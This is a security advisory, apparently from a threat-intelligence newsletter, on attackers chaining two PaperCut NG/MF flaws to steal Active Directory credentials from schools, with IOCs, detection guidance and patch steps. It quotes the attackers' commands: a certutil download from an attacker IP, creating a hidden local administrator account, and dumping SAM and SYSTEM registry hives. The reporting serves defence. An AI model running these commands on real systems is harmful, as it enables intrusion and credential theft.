CVSS 9.4
Severity of CVE-2026-82078 unsafe dynamic class loading that enables unauthenticated RCE when chained with the CVE-2026-81578 authentication bypass
45.142.193.132
Attacker-controlled IP confirmed delivering credential-theft tooling to compromised PaperCut servers at K-12 schools and universities in the U.S. and Europe
Version 24.1.10
Minimum PaperCut NG/MF Emergency Patch Release 2 build required to close both CVE-2026-81578 authentication bypass and CVE-2026-82078 RCE vulnerabilities
2 CVEs Chained
CVE-2026-81578 (CVSS 8.8) authentication bypass plus CVE-2026-82078 (CVSS 9.4) class loading flaw produce full pre-authentication RCE on PaperCut print management servers

SponsoredHorizon3.ai

Proactive Security for the AI Era

NodeZero continuously and autonomously pentests infrastructure, identity, cloud, and now web applications, chaining weaknesses across every domain the way real attackers do. Every finding ships with replayable proof showing exploitable business impact, not theoretical risk.

See NodeZero WebApp in action

Threat actors are actively chaining CVE-2026-81578 and CVE-2026-82078 in PaperCut NG and PaperCut MF to steal Active Directory credentials from K-12 schools and universities across the United States and Europe, with Arctic Wolf confirming ongoing exploitation as of September 5, 2026. The attack requires no valid credentials at any stage: the CVE-2026-81578 authentication bypass gives attackers unauthenticated write access to server configuration, which they use to trigger CVE-2026-82078 unsafe dynamic class loading for full remote code execution under the PaperCut service account. Both CVEs were added to the CISA Known Exploited Vulnerabilities catalog on September 2, 2026.

Post-exploitation activity is consistent across confirmed compromises. Threat actors run Windows discovery commands immediately after gaining code execution, then pull credential-harvesting tools from attacker-controlled infrastructure at 45.142.193.132 using certutil.exe. Observed payloads include Metasploit Meterpreter Java stagers and registry hive collection utilities targeting NTLM hashes. Attackers create the local administrator account Administrator17 for persistent access before pivoting to Active Directory enumeration.

The urgency for education IT teams is immediate. PaperCut servers in school environments typically run under a domain service account with broad AD read access, making a compromised print server a direct path to organizational credential stores. PaperCut released Emergency Patch Release 2 on August 28, 2026, bringing fixed versions to 24.1.10, 25.0.13, and 26.0.5. Organizations running version 24 who applied only Emergency Patch Release 1 remain fully vulnerable. PaperCut version 23 and earlier receive no patch and must upgrade. With exploitation confirmed across U.S. and European school networks, any organization running a vulnerable build faces active targeting. Apply Emergency Patch Release 2 before end of day.

How the PaperCut Authentication Bypass Works

CVE-2026-81578 is classified as an improper access control vulnerability, CWE-284, with a CVSS base score of 8.8. The flaw resides in the PaperCut NG/MF web management interface and exploits a timing gap in the access validation sequence. Under specific conditions, unauthenticated HTTP requests targeting administrative functions reach backend handlers and complete state mutations before the authentication gate finishes validating the requester's session. The attacker does not need a token, session cookie, or credentials to trigger this path.

The vulnerability is network-accessible with no privileges required and no user interaction needed. The attack vector is the web management interface, which most PaperCut deployments expose on TCP port 9191 or 9192. Any server with the management interface reachable from untrusted networks, including internet-facing deployments or those reachable from a compromised network segment, falls within the blast radius.

CVE-2026-81578 becomes critical when combined with CVE-2026-82078, a CVSS 9.4 unsafe dynamic class loading vulnerability in the database connection utilities. PaperCut MF and NG instantiate JDBC driver classes based on configurable driver name parameters stored in the server configuration. The application does not validate the requested class name against an allowlist of approved drivers before instantiation. An attacker who can write to the database driver configuration field, which CVE-2026-81578 enables without authentication, can supply a malicious class name that the server instantiates and executes as arbitrary Java bytecode.

The resulting exploit chain requires a single HTTP session: one unauthenticated POST to manipulate the database driver parameter, followed by a request that triggers class instantiation, producing code execution under the PaperCut server process security context. Similar authentication bypass vulnerabilities recently affected Citrix NetScaler ADC and Gateway, confirming that management plane authentication gaps on network-adjacent services remain a primary attacker priority heading into fall 2026.

Who Is Affected by the PaperCut Campaign?

PaperCut NG and PaperCut MF are among the most widely deployed print management platforms globally, with PaperCut Software reporting installations at more than 70 percent of universities worldwide and at tens of thousands of K-12 institutions. The education sector concentration makes this campaign highly consequential: a compromised print server in a school environment typically runs under a domain service account with broad Active Directory read access, placing organizational credential stores within one pivot of the initial foothold.

Affected versions span three major release branches. PaperCut NG and MF 24 below 24.1.10, version 25 below 25.0.13, and version 26 below 26.0.5 are all vulnerable to the full CVE-2026-81578/82078 chain. The entire version 23 branch and all earlier versions are vulnerable and will not receive a patch. Organizations on those legacy versions must treat their print servers as fully compromised until they upgrade to a supported, patched release.

One gap is particularly important for organizations that applied Emergency Patch Release 1 on August 28, 2026. That first patch fixed versions 25 and 26 only. Version 24 was not included until Emergency Patch Release 2, shipped later the same day. Any PaperCut 24 installation below 24.1.10 that received only the first patch remains fully exploitable. Confirm the exact running version in the PaperCut admin interface under About, then cross-check against the fixed build numbers.

The campaign extends beyond education. Arctic Wolf's analysis confirms that while education sector victims predominate in current telemetry, PaperCut NG/MF is deployed broadly across healthcare, legal, and financial services organizations that run the same vulnerable versions. Any internet-facing or network-accessible PaperCut management interface below the patched thresholds should be treated as actively targeted. This credential-theft pattern mirrors the Gentlemen ransomware campaign's certutil-based payload delivery observed in August 2026.

Free daily briefing

Briefings like this, every morning before 9am.

Threat intel, active CVEs, and campaign alerts, distilled for practitioners. 50,000+ subscribers. No noise.

Threat Actor TTPs: From Auth Bypass to AD Credential Theft

The post-exploitation sequence observed across confirmed compromises follows a consistent pattern documented by Arctic Wolf researchers. Immediately after establishing code execution on the PaperCut server, threat actors run four Windows discovery commands: uname, whoami, ver, and tasklist. These confirm the operating system version, current user context, and running processes before the attacker proceeds with lateral movement tooling.

The credential-theft phase uses certutil.exe, a legitimate Windows binary present on all Windows Server installations, to download payloads from 45.142.193.132. The command pattern is certutil.exe -urlcache -split -f [URL] [output_path], which bypasses application whitelisting controls that block unknown executables but permit system binaries. Downloaded tools include Metasploit Meterpreter Java stagers, consistent with a tool chain that avoids writing standard Meterpreter executables to disk, and Windows registry hive collection utilities targeting HKLM\SAM, HKLM\SYSTEM, and HKLM\SECURITY for offline NTLM hash extraction.

Persistence comes through account creation rather than scheduled tasks or registry run keys. Threat actors run net user Administrator17 /add followed by net localgroup Administrators Administrator17 /add, establishing a local administrator account that survives PaperCut service restarts and basic remediation that focuses on the print application without auditing local Windows accounts.

The full TTP chain maps to MITRE ATT&CK techniques T1190 (Exploit Public-Facing Application), T1059.001 (Command and Scripting Interpreter: PowerShell/cmd), T1003 (OS Credential Dumping), T1136.001 (Create Account: Local Account), and T1105 (Ingress Tool Transfer via certutil). The attacker IP 45.142.193.132 serves multiple tool variants and has been confirmed active in this campaign since at least September 3, 2026.

1

Auth Bypass via CVE-2026-81578

Unauthenticated POST to PaperCut web management interface exploits the timing gap in access validation to write malicious JDBC driver class name into server configuration.

2

RCE via CVE-2026-82078

PaperCut database connection utility instantiates the attacker-supplied Java class without allowlist validation, executing arbitrary bytecode under the PaperCut service process.

3

Discovery and Reconnaissance

Threat actors run uname, whoami, ver, and tasklist to confirm OS version, privilege level, and running processes on the compromised print server.

4

Certutil Tool Transfer

certutil.exe -urlcache -split -f pulls credential-harvesting payloads from 45.142.193.132, bypassing application whitelisting controls that permit trusted Windows binaries.

5

NTLM Hash Collection

Registry hive collection tools extract NTLM hashes from HKLM\SAM, HKLM\SYSTEM, and HKLM\SECURITY for offline cracking and pass-the-hash against Active Directory.

6

Persistent Access via Administrator17

net user Administrator17 /add creates a local administrator account for persistence that survives application-layer remediation focusing only on the PaperCut service.

PaperCut servers in education environments authenticate against Active Directory, which means one compromised print server provides access to the same credential stores protecting the entire domain.

Arctic Wolf Networks, September 2026

Indicators of Compromise for the CVE-2026-81578 Campaign

Block the attacker IP and deploy the following indicators to your SIEM and EDR tooling immediately. The URI path pattern /custom/pcp_*.txt is used by attackers to probe PaperCut configuration file accessibility during the initial exploitation phase. Inbound GET requests from 45.142.193.132 requesting this path indicate active exploitation in progress.

Windows Security Event ID 4720 with TargetUserName set to Administrator17 is a high-confidence post-exploitation indicator requiring immediate investigation and account removal. This account name has appeared in every confirmed compromise reported by Arctic Wolf and is not a legitimate PaperCut or Windows administrative account name. Any occurrence should trigger immediate incident response.

Certutil.exe spawned with -urlcache and -f flags is a known tool-transfer technique. When the parent process is PCATomcatService.exe, PCApp.exe, or any PaperCut process, the combination is unambiguous: this is post-exploitation tool delivery, not legitimate certificate operations. The NTLM hash extraction tools delivered in this campaign write to temporary directories before being executed from memory.

For network-layer detection, block all traffic from 45.142.193.132 at your perimeter firewall. Monitor outbound connections from your PaperCut server host to any external IP on ports 4444, 8080, and 443 that do not match your update server or licensing infrastructure. Meterpreter reverse shells in this campaign use non-standard ports alongside standard HTTPS to blend with legitimate traffic.

Subscribe to unlock Indicators of Compromise

Free subscribers unlock full IOC lists, Sigma detection rules, remediation steps, and every daily briefing.

Sigma Detection Rules for CVE-2026-81578 PaperCut Exploitation

No CVE-specific community Sigma rules exist yet for CVE-2026-81578 and CVE-2026-82078. The following two rules were generated by Decryption Digest from the confirmed attack behaviors documented in Arctic Wolf and Rapid7 research. Both carry status: experimental. Validate against your environment before production deployment, particularly the webserver logsource rule, which requires PaperCut application logs or a web proxy to be feeding your SIEM.

Rule 1 targets the initial exploitation probe: unauthenticated GET requests to /custom/pcp_*.txt paths that indicate an attacker testing configuration file accessibility during the CVE-2026-81578 exploitation sequence. Deploy this rule to any log source ingesting PaperCut application server logs or reverse proxy access logs. Expected false positives include legitimate PaperCut health monitoring scripts and configuration management tools.

Rule 2 targets the post-exploitation credential-harvesting phase: certutil.exe spawned with URL download flags from PaperCut process parents, and net.exe commands referencing the Administrator17 account name. This rule requires Windows Sysmon (Event ID 1) or equivalent EDR process creation telemetry. The certutil detection condition is high-fidelity when constrained to PaperCut parent processes. The Administrator17 account creation condition is critical-severity with virtually no false positive risk.

All 10 vendor-specific detection queries are available to paid subscribers in the Detect tab of the threat intelligence portal. WAF rules targeting the CVE-2026-81578 exploit pattern across ModSecurity, Cloudflare, AWS WAF, Azure Front Door, F5, Cisco FTD, and Fortinet are also available to subscribers. Restrict PaperCut web management interface access to management VLANs while patches are applied.

Subscribe to unlock Sigma Detection Rules

Free subscribers unlock full IOC lists, Sigma detection rules, remediation steps, and every daily briefing.

Subscribe to unlock Sigma Hunt Queries

Free subscribers unlock full IOC lists, Sigma detection rules, remediation steps, and every daily briefing.

Subscribe to unlock WAF Detection Rules

Free subscribers unlock full IOC lists, Sigma detection rules, remediation steps, and every daily briefing.

Remediation: Apply PaperCut Emergency Patch Release 2 Before End of Day

Block 45.142.193.132 at your perimeter firewall now. This IP is the confirmed attacker infrastructure delivering credential-theft payloads to compromised PaperCut servers and should be blocked regardless of whether your servers are patched, as blocking limits attacker tooling retrieval even on already-compromised hosts.

Then audit your PaperCut servers immediately: check the About page in the admin interface for the running build number. Anything below 24.1.10, 25.0.13, or 26.0.5 requires immediate patching. Any version 23 or earlier requires upgrading to a supported branch.

After patching, hunt for post-exploitation artifacts. Check for local administrator accounts named Administrator17 on all PaperCut host systems. Review PaperCut application logs for anomalous configuration changes since August 27, 2026, the date PaperCut disclosed active exploitation. Investigate any outbound connections from your PaperCut server host to external IPs since that date, particularly from certutil.exe or java.exe.

If you find evidence of compromise, treat the host as fully compromised. Rotate all service account credentials, reset the PaperCut application admin password, and initiate Active Directory credential rotation for all accounts accessible from the PaperCut host's domain membership. NTLM hashes extracted from SAM and SYSTEM hives enable pass-the-hash attacks against any domain resource accessible by those accounts.

Apply official patch →www.papercut.com/security/advisories/

Subscribe to unlock Remediation & Mitigation steps

Free subscribers unlock full IOC lists, Sigma detection rules, remediation steps, and every daily briefing.

Why PaperCut CVE-2026-81578 Matters for Your Education Security Program

The PaperCut CVE-2026-81578/82078 campaign illustrates a recurring attacker logic in the education sector: target network-adjacent management services that authenticate against Active Directory, because a single compromised service account opens the entire domain. Print management servers are rarely included in perimeter scanning or vulnerability management programs that focus on firewalls, VPNs, and web-facing applications. They run as domain-joined services with broad AD access, making them high-value targets precisely because defenders prioritize other surfaces.

The credential-theft focus of this campaign also points to a longer-term attacker timeline. Stolen NTLM hashes from school AD environments enable offline cracking and pass-the-hash attacks. Some of those hashes will be valid for weeks or months before the organization detects the breach. Education institutions using PaperCut that find no current IOCs but ran vulnerable builds since August 27 should assume credential exposure and initiate rotation regardless.

For security teams without a dedicated education sector focus, this campaign demonstrates that any organization relying on PaperCut NG or MF for print management shares the same attack surface as the directly targeted schools. The print management server is not a low-priority asset when it runs under a domain service account. Treat it with the same patch urgency as a perimeter VPN or remote access gateway.

Patch to Emergency Patch Release 2 before end of day, block the confirmed attacker IP, audit for post-exploitation artifacts, and deploy the detection rules. Organizations that cannot patch immediately should restrict the web management interface to management VLANs as an interim control that eliminates the remote exploitation path for CVE-2026-81578.

The bottom line

PaperCut CVE-2026-81578 and CVE-2026-82078 are being actively chained to steal Active Directory credentials from K-12 schools and universities across the U.S. and Europe, with confirmed exploitation since at least September 3, 2026. Three actions matter now: apply Emergency Patch Release 2 to reach version 24.1.10 or higher, block 45.142.193.132 at your perimeter, and hunt for the Administrator17 local account on every PaperCut host. If you find that account, initiate full incident response and rotate all AD credentials reachable from the compromised host before end of day.

This analysis is generic. create a free account to score threats like this against your own stack.

Frequently asked questions

What is CVE-2026-81578 in PaperCut NG and MF?

CVE-2026-81578 is a CVSS 8.8 improper access control vulnerability in the PaperCut NG and PaperCut MF web management interface. Under specific conditions, unauthenticated remote HTTP requests targeting administrative functions can trigger backend actions before access validation completes. This bypass allows an attacker to manipulate system configuration parameters without valid credentials, creating the conditions needed to chain CVE-2026-82078 for remote code execution.

How does the PaperCut authentication bypass chain into remote code execution?

CVE-2026-81578 gives an unauthenticated attacker write access to PaperCut system configuration parameters via the web management interface. The attacker uses that configuration write capability to inject a malicious Java class driver name into the database connection utilities covered by CVE-2026-82078. PaperCut instantiates the specified class without allowlist validation, executing arbitrary Java bytecode under the PaperCut server process security context. No credentials are needed at any step of the chain.

Which versions of PaperCut NG and MF are vulnerable to CVE-2026-81578?

Any PaperCut NG or MF installation running below version 24.1.10, 25.0.13, or 26.0.5 is vulnerable. The entire version 23 branch and earlier are also affected and will not receive a patch; those installations must upgrade to a supported version. PaperCut released Emergency Patch Release 1 on August 28, 2026 for versions 25 and 26, then Emergency Patch Release 2 the same day to cover version 24. Any server below these thresholds is actively targeted.

What is PaperCut Emergency Patch Release 2 and which versions does it cover?

Emergency Patch Release 2 is PaperCut's second fix shipped on August 28, 2026 to address both CVE-2026-81578 and CVE-2026-82078. It brings PaperCut NG/MF 24 to version 24.1.10, version 25 to 25.0.13, and version 26 to 26.0.5. Emergency Patch Release 1 patched only versions 25 and 26. Organizations on version 24 who applied only Emergency Patch Release 1 remain vulnerable and must upgrade to 24.1.10. PaperCut version 23 and earlier receive no patch.

How do attackers steal Active Directory credentials through PaperCut?

After gaining remote code execution on the PaperCut server via the CVE-2026-81578/82078 chain, threat actors deploy certutil.exe with URL download flags to pull credential-harvesting tools from attacker infrastructure at 45.142.193.132. Observed tools include Metasploit Meterpreter Java payloads and Windows registry hive collection utilities that extract NTLM hashes from HKLM\SAM, HKLM\SYSTEM, and HKLM\SECURITY. Attackers also run Windows discovery commands, then create the privileged account Administrator17 for persistent access.

What are the indicators of compromise for the PaperCut education sector campaign?

Confirmed IOCs include inbound GET requests from IP 45.142.193.132 requesting URI paths matching /custom/pcp_*.txt. Post-exploitation artifacts include a newly created local administrator account named Administrator17, certutil.exe invoked with the -urlcache -split -f flags from the PaperCut Tomcat service process, and Java Meterpreter payloads loaded into the PaperCut application classpath. Discovery commands uname, whoami, ver, and tasklist run immediately after initial access confirm active exploitation.

How do I detect CVE-2026-81578 exploitation attempts on my PaperCut server?

Search web server logs for GET requests to /custom/pcp_*.txt from external IP ranges, particularly 45.142.193.132. In Windows Security Event logs, look for Event ID 4720 with TargetUserName of Administrator17. In Sysmon or EDR logs, look for certutil.exe with -urlcache in the command line spawned from PCATomcatService.exe or PCApp.exe. In PaperCut application logs, hunt for unauthenticated access attempts to administrative configuration endpoints flagged before the authentication gate completes.

Is PaperCut widely used in schools and universities?

PaperCut NG and MF are among the most widely deployed print management platforms in the education sector. PaperCut Software reports that its products are used at more than 70 percent of universities globally and by tens of thousands of K-12 institutions. This broad install base in education makes the sector a high-yield target for credential theft, since school print servers routinely authenticate against Active Directory and have access to the same credential stores as other domain-joined systems.

Sources & references

  1. CISA KEV - Seven Exploited Vulnerabilities Added September 2, 2026
  2. Rapid7 ETR - PaperCut NG/MF Critical Zero-Day Exploited in the Wild
  3. The Hacker News - Attackers Exploit PaperCut Flaws to Steal Credentials From Schools and Universities
  4. BleepingComputer - PaperCut Releases Second Emergency Patch for Exploited Flaws
  5. Security Affairs - PaperCut Flaws Exploited in Attacks on U.S. and European Schools

Free resources

25
Free download

Critical CVE Reference Card 2025–2026

25 actively exploited vulnerabilities with CVSS scores, exploit status, and patch availability. Print it, pin it, share it with your SOC team.

No spam. Unsubscribe anytime.

Free download

Ransomware Incident Response Playbook

Step-by-step 24-hour IR checklist covering detection, containment, eradication, and recovery. Built for SOC teams, IR leads, and CISOs.

No spam. Unsubscribe anytime.

Free newsletter

Get threat intel before your inbox does.

50,000+ security professionals read Decryption Digest for early warnings on zero-days, ransomware, and nation-state campaigns. Free, daily, no spam.

Unsubscribe anytime. We never sell your data.

Eric Bang
Author

Founder & Cybersecurity Evangelist, Decryption Digest

Cybersecurity professional with expertise in threat intelligence, vulnerability research, and enterprise security. Covers zero-days, ransomware, and nation-state operations for 50,000+ security professionals every morning.

Giveaway: InfoSec World 2026 All Access Pass ($3,895 value)

Details →
Daily Briefing

Subscribe to enter the giveaway

Every subscriber is automatically entered. You also get daily threat intel every morning: zero-days, ransomware, and nation-state campaigns. Free. No spam.

Already subscribed? You're already entered.

Giveaway

Win a $3,895 InfoSec World 2026 pass.